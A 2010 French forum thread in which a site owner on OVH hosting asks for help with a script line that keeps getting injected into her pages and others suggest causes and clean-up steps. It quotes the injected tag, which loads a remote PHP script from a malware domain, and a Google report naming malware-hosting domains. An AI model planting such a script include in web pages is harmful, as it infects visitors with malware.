virus récurant sur un site

virus récurant sur un site - HTML/CSS - Programmation

Marsh Posté le 28-07-2010 à 14:42:35    

Bonjour je suis dépitée je ne sais plus quoi faire.
 
Je vous explique ,  j'ai fait mon propre site, et le site de deux trois amies  Tous les sites sont hébergés chez OVH .
 
LE soucis est que je met en ligne mon site ( avant par Core FTP maintenant par Filezilla).  
Je change très souvent les mots de passes FTP,  et sur le site de mon amie il s y met fréquement le virus dans son code.
 
J'ai aucun virus sur le pc ( il vient aussi d'être reformaté ).
Mais chaque fois Google finit par le rejeter à cause d'intertion dans le code .  
Pourriez vous me dire comment empêcher l'insertion de cochonnerie sur les codes?
 
j'ai essayer en bloquant les permissions d'écriture via les commande Chmod ( excusez l'orthographe) mais rien ne vas ma copine devient folle et moi je deviens chauve mdr
 
La j'attends la revisite de google pour la 100 em fois mais je sais que cela reviendra ENCORE .
 
Merci de m'aider si vous en avez le temps .

Reply

Marsh Posté le 28-07-2010 à 14:42:35   

Reply

Marsh Posté le 28-07-2010 à 15:31:12    

et si tu copies le contenue de ton site en local puis tu fait une recherche antivirus par dessus, t'auras sans doute le fichier incriminé après il faudra analyser le dis fichier pour voir d'ou provient le bug.
Sinon y a pas plus d'informations sur le fait que google rejette ton site ?
ptet que c'est une erreur de code (genre boucle infinie ou intrusion de script javascript ) et donc pas vraiment un virus...

Reply

Marsh Posté le 28-07-2010 à 15:35:09    

merci de votre réponse : en fait c'est une ligne de script qui se met sans que je le mette mois dessus . sans que je ne touche a rien .  
 
donc chaque fois je la supprime remet ma page clean et cela revient soit sur celle la soit sur une autre  
 
donc en fait je suis impuissante . je lis un peu partout qu'on parle de htt access ou un truc du genre mais je ne connais pas n y aurait il pas un moyen d'empêcher l'injection de script sur mes codes?

Reply

Marsh Posté le 28-07-2010 à 15:44:14    

fait voir la ligne qui revient tout le temps
y aurait il une ligne quelconque de caracteres bizarre dans ton css ?


Message édité par krifur le 28-07-2010 à 15:45:56
Reply

Marsh Posté le 28-07-2010 à 17:02:23    

re  
 
voici ce que je viens de reprendre:
<script src=http://mamata.com/Connections/mid_jobs_detail.ph
p >
 
mais ce n'est pas tjrs cette ligne des fois le texte change mais c est tjrs ce style .  
 

Reply

Marsh Posté le 28-07-2010 à 17:04:07    

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.
 
Une partie de ce site a été répertoriée 7 fois comme générant une activité suspecte au cours des 90 derniers jours.
 
Que s'est-il passé lorsque Google a visité ce site ?
Sur les 32 pages testées sur ce site au cours des 90 derniers jours, 24 page(s) a (ont) généré le téléchargement et l'installation de programmes malveillants sans l'autorisation de l'internaute. Google a visité ce site pour la dernière fois le 2010-07-27 et un contenu suspect a été détecté sur ce site pour la dernière fois le 2010-07-27.
Malicious software includes 16 exploit(s), 2 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
 
Le programme malveillant est hébergé sur 7 domaine(s), dont kockoy.com/, zakopane-rodzinnie.pl/, mamata.com/.
 
1 domaine(s) semble(nt) avoir servi d'intermédiaire pour la diffusion de logiciels malveillants auprès des visiteurs de ce site, dont mamata.com/.
 
This site was hosted on 1 network(s) including AS16276 (OVH).
 
Ce site a-t-il servi d'intermédiaire pour la diffusion de programmes malveillants ?
Au cours des 90 derniers jours, delacharmeraie.com ne semble pas avoir servi d'intermédiaire pour l'infection de sites Web.
 
Ce site a-t-il déjà hébergé des programmes malveillants ?
Non, ce site n'a pas hébergé de programmes malveillants au cours des 90 derniers jours.
 
Comment cela s'est-il produit ?
Dans certains cas, des tiers peuvent ajouter un code malveillant à des sites Web légitimes, ce qui nous amène à afficher le message d'avertissement.
 

Reply

Marsh Posté le 28-07-2010 à 17:04:56    

il faut vraiment que je  remédie à cela . cela me mine

Reply

Marsh Posté le 28-07-2010 à 18:45:45    

Ça m'est arrivé plusieurs fois sur les serveur de mes clients, et c'est très fréquent, mais seulement sur les hébergement mutualisé d'OVH (sur mes hebergement 1&1, jamais de problèmes...)

 

Bref toujours est-il qu'en supprimant tout le contenu du FTP, changeant tous mes mots de passe (plateforme OVH + FTP), puis en reexportant le site (en ayant retiré tous les script des .html / .js et je ne sais quoi), je n'ai plus eu de problème...
Remarquez que je n'ai pas changé les logs de mes BDD...

 

Je n'ai jamais su d'où venait le problème, je ne pense pas à un virus, je suis très pointilleux là dessus (je suis sous linux)...
En plus, si c'était du coté software, ça aurait atteint mes autres FTP...
Je ne pense pas non plus que ce soit les boites mail de TOUS mes clients concerné qui auraient été lurké par un bot...

 

Je pense plutôt que la faille vient d'OVH perso...


Message édité par abais le 28-07-2010 à 18:47:27

---------------
Le membre ci-contre n'est pas responsable du message ci-dessus.
Reply

Marsh Posté le 28-07-2010 à 19:18:19    

c'est ce que je me dis aussi ,  je me demande si je ne ferais pas mieux d'heberger mes sites ailleurs car là cela devient saoulant .

Reply

Marsh Posté le 28-07-2010 à 19:44:28    

Perso, j'ai un hébergement OVH que je n'utilise pas, et pas de problème. Utilises-tu un site statique ou un script genre CMS ou blog ?


---------------
http://www.aideinfo.com/  Whois adresses IP/domaines le plus évolué !!  FAQ Free Mobile
Reply

Marsh Posté le 28-07-2010 à 19:44:28   

Reply

Marsh Posté le 28-07-2010 à 20:03:37    

c'est un site que j'ai fait avec frontpage ( je suis autodidacte) ,  
là je viens d'essayer de tout supprimer de l'hébergement il ne me le supprime pas .  
 
 

Reply

Marsh Posté le 28-07-2010 à 20:34:01    

mon propre site meme hebergement j ai jamais eu de soucis  
www.catsnblue.com j pige pas

Reply

Marsh Posté le 29-07-2010 à 11:48:28    

ptet que tu as une faille sur certains de tes sites qui permettent une attaque de ce genre...
utilises tu des scripts déjà fait genre phpbb ou autre...
t as regarder dans le syslog ou apache.log si tu retrouve des traces de ces adresses :kockoy.com/, zakopane-rodzinnie.pl/, mamata.com/.

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed